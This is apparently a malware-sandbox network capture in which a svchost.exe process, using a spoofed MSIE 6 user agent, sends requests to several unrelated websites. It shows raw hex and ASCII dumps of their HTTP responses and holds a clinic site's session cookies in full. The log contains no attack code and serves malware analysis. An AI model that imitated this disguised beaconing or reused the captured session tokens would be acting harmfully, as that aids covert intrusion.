                                                                                                                                                                                                                                                        CF-RAY: 81371a40da1a2b8a-LAX
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3293INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c
                                                                                                                                                                                                                                                        Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial,
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3294INData Raw: 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: html>
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3294INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        27192.168.2.361228185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3179OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3582INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:10 GMT
                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                        X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3583INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        28192.168.2.36217294.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3292OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4338INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:11 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4338INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        29192.168.2.362729104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3584OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: www.clinicasanluis.com.co
                                                                                                                                                                                                                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImxEUHpsV3JtaW5IRVQ4eUNZTjRWTXc9PSIsInZhbHVlIjoiQm5aQmpPNlN0UkZHenk0WkZsZDNFSmFuMThINm5kVXR2dFZoS1dDYVlTaHRiUkZlZGQyYUcwZTltNnRnN0VseGpEMVVTQi8xbjgrYUR6VWFBOW5ZMEx3Q2t2cGg0bFZPc25wdnVwOCtFSlRPTHVxNmRwbFk2Z1JUeEtBek55MGoiLCJtYWMiOiI3YjAxYTZjNDBiYzA2MmMxN2E4MDJmMzM3NzE3MTE2MDcxYTlhN2Q5NmNmMjVkZDVkMjMxZjZiZTk2ZGRiNGY1IiwidGFnIjoiIn0%3D; clinicasanluis_session=eyJpdiI6IlpUQjN3YnJteGN4eUZ0NTFQRlhVV1E9PSIsInZhbHVlIjoidkg3VXU3WGhUSllXVmxQSXNKekozZE1sSWpKVGtYbWROcVhVaCtpNWI3VytPd0dDQlRJd2diajIwTzMrbTFOdXI2NmJWYUI1MXQwQ2ZVTlA5d0NxRHhjd0hWM0VVbnZXRkozVWgwTjdsTEI1MlJWdFVsQmUxWGErU3lrQ01HcDMiLCJtYWMiOiJjZjIzZjQ4ZjU4NmNhNTE4NGE3YzJiYmU3YjMyODMxMWQ3YjMwZjIyMmU4N2NkYWYwNjllNWM5OGE2NjM2N2JlIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8162INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:12 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        x-powered-by: PHP/8.1.23
                                                                                                                                                                                                                                                        Cache-Control: no-cache, private
                                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                        set-cookie: XSRF-TOKEN=eyJpdiI6IldtOEdpRGY0VW1MY0hFVGcxSHR4U2c9PSIsInZhbHVlIjoiVlJiZnU5aVoxTHlOUGc2S3c0MXdJdGNkK2twdkRBVlJDTzNIRlRxTUVMWFZwcGRncG4wRzYyd1BaU2hFSFpwR3kxcjdLbFBOaFpFOVhrRjMwNG4vSnFkV080STFSUU5Pb3c3SllLQ3ZNVEU4bFJUQ3FCZTBEYlpSVktzWmg1Vy8iLCJtYWMiOiI0NTAxOGQ2ZGM4ZmViODI5Y2QwY2UzMzI5ZGM4MmEyOTJmNjg0ZjA3N2EyMDljZGVhNjBiNGVlODllNzNkYzkxIiwidGFnIjoiIn0%3D; expires=Mon, 09-Oct-2023 15:52:11 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                        set-cookie: clinicasanluis_session=eyJpdiI6InozTTl4L0NOQW12N2RCSDJPZ3Y0S3c9PSIsInZhbHVlIjoia0ZJcERzYkNkQjVwRFRZYytnTmw0QzdJd2crS2ZMZ09ZUnhSMUZtRFJKcThjL1krc0t4N1JJRzJwdXkvQnlxWFRWZkFxUURqclF0WnJoVTR1cWgxN0hTeEIrdWhlVWd4UlpGRGdOOS9FbmVhRndLTmRVZVc1UzFjWTJ2N3VBcGgiLCJtYWMiOiJmMDRiZjVhMGMyMDAxY2ZmZjFiZTExMzEwOWE5ZjFlZTczNzUyMjhjZmJjYWRlZWU5MDRkNjY0YmQ1ZGRiZjMxIiwidGFnIjoiIn0%3D; expires=Mon, 09-Oct-2023 15:52:11 GMT; Max-Age=7200; path=/; httponly; secure
                                                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8163INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 37 54 38 76 53 69 77 4d 6f 70 4a 44 54 75 36 4a 75 61 41 44 55 49 6b 46 41 64 65 69 66 25 32 42 36 25 32 46 49 67 25 32 46 4d 25 32 42 4b 48 6d 46 55 62 76 7a 65 25 32 46 59 61 77 6b 4c 51 70 69 6a 73 4d 32 76 4c 76 71 6c 25 32 42 41 73 4a 4b 57 74 6a 54 41 54 58 53 73 62 46 4f 4b 4f 55 52 25 32 42 6c 32 4a 46 32 57 34 58 65 62 70 6c 4c 64 54 56 6f 73 53 41 25 32 42 63 5a 4e 49 25 32 46 74 63 4e 46 52 4b 48 59 5a 6a 43 66 68 50 52 6e 46 71 4f 43 79 45 6c 56 6f 59 75 37 30 52 6a 69 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66
                                                                                                                                                                                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7T8vSiwMopJDTu6JuaADUIkFAdeif%2B6%2FIg%2FM%2BKHmFUbvze%2FYawkLQpijsM2vLvql%2BAsJKWtjTATXSsbFOKOUR%2Bl2JF2W4XebplLdTVosSA%2BcZNI%2FtcNFRKHYZjCfhPRnFqOCyElVoYu70Rji"}],"group":"cf
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8163INData Raw: 37 66 66 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 0a 20 20 20 20 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 53 69 74 65 20 54 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 31 53 35 53 4d 45 44 48 33 4b 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61
                                                                                                                                                                                                                                                        Data Ascii: 7ff9<!doctype html><html lang="es"><head> ... Global Site Tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-1S5SMEDH3K"></script> <script> window.dataLayer = window.dataLa
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8165INData Raw: 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 73 65 6f 2f 73 65 6f 2d 6d 65 74 61 64 61 74 61 2d 73 69 74 65 2d 36 34 39 2e 6a 70 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6c c3 ad 6e 69 63 61 20 53 61 6e 20 4c 75 c3 ad 73 20 70 61 72 61 20 6c 61 20 6d 75 6a 65 72 20 79 20 65 6c 20 6e 69 c3 b1 6f 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 72 65 73 65 72 76 61 6d 6f 73 20 6c 61 20 76 69 64 61 20 64 65 20 6c 61 20 6d 75 6a 65 72 20 79 20 65 6c 20 6e 69 c3 b1 6f 20 61 20 74 72 61 76 c3 a9
                                                                                                                                                                                                                                                        Data Ascii: content="https://www.clinicasanluis.com.co/images/seo/seo-metadata-site-649.jpg"><meta property="og:title" content="Clnica San Lus para la mujer y el nio"><meta property="og:description" content="Preservamos la vida de la mujer y el nio a trav
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8166INData Raw: 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 36 30 30 3b 37 30 30 26 66 61 6d 69 6c 79 3d 52 75 62 69 6b 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 74 79 6c 65 22 0a 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 37 30 30 3b 39 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 0a 20 20 20 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e
                                                                                                                                                                                                                                                        Data Ascii: ?family=Open+Sans:wght@400;600;700&family=Rubik:wght@400;500;600;700&display=swap"></noscript><link rel="preload" as="style" href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700;900&display=swap" onload="this.onload=null;this.
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8167INData Raw: 20 50 6f 70 75 70 20 43 53 53 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 21 2d 2d 20 49 63 6f 6e 73 20 43 53 53 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c
                                                                                                                                                                                                                                                        Data Ascii: Popup CSS --><link rel="stylesheet" href="https://www.clinicasanluis.com.co/assets/css/magnific-popup.min.css">... Icons CSS --><link rel="stylesheet" href="https://www.clinicasanluis.com.co/assets/fonts/font-awesome/css/all.min.css"><link rel="styl
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8169INData Raw: 79 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 73 6c 69 63 6b 2d 63 61 72 6f 75 73 65 6c 2f 31 2e 38 2e 31 2f 73 6c 69 63 6b 2d 74 68 65 6d 65 2e 63 73 73 22 0a 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 36 6c 4c 55 64 65 51 35 75 68 65 4d 46 62 57 6d 33 43 50 32 37 31 6c 31 34 52 73 58 31 78 74 78 2b 4a 35 78 32 79 65 49 44 6b 6b 69 42 70 65 56 54 4e 68 54 71 69 6a 4d 45 37 47
                                                                                                                                                                                                                                                        Data Ascii: y="no-referrer" onload="this.onload=null;this.rel='stylesheet'" /><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick-theme.css" integrity="sha512-6lLUdeQ5uheMFbWm3CP271l14RsX1xtx+J5x2yeIDkkiBpeVTNhTqijME7G
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8170INData Raw: 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 74 68 65 6d 65 73 2f 64 61 6d 6f 73 66 72 6f 6e 74 65 6e 64 2f 72 65 76 6f 6c 75 74 69 6f 6e 2f 63 73 73 2f 6e 61 76 69 67 61 74 69 6f 6e 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 21 2d 2d 20 52 45 56 4f 4c 55 54 49 4f 4e 20 53 4c 49 44 45 52 20 43 55 53 54 4f 4d 20 43 53 53 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 74 68 65 6d 65 73 2f 64 61 6d 6f 73 66 72
                                                                                                                                                                                                                                                        Data Ascii: css" href="https://www.clinicasanluis.com.co/themes/damosfrontend/revolution/css/navigation.css" /> </noscript> ... REVOLUTION SLIDER CUSTOM CSS --> <link rel="stylesheet" type="text/css" href="https://www.clinicasanluis.com.co/themes/damosfr
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8171INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63
                                                                                                                                                                                                                                                        Data Ascii: <i class="fab fa-instagram"></i> </a> </li> </ul> </div> </div> <div c
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8173INData Raw: 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 62 6f 74 74 6f 6d 2d 68 65 61 64 65 72 20 70 71 2d 68 61 73 2d 73 74 69 63 6b 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 63 75 73 74 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 32
                                                                                                                                                                                                                                                        Data Ascii: /ul> </div> </div> </div> </div> </div> <div class="pq-bottom-header pq-has-sticky"> <div class="container-custom"> <div class="row"> <div class="col-lg-12
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8174INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 6d 69 73 69 6f 6e 2d 79 2d 76 69 73 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4d 69 73 69 c3 b3 6e 20 79 20 56 69 73 69 c3 b3 6e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="nosotros/mision-y-vision" target="_self">Misin y Visin</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8175INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 67 6f 62 69 65 72 6e 6f 2d 63 6f 72 70 6f 72 61 74 69 76 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 47 6f 62 69 65 72 6e 6f 20 43 6f 72 70 6f 72 61 74 69 76 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="nosotros/gobierno-corporativo" target="_self">Gobierno Corporativo</a></li>
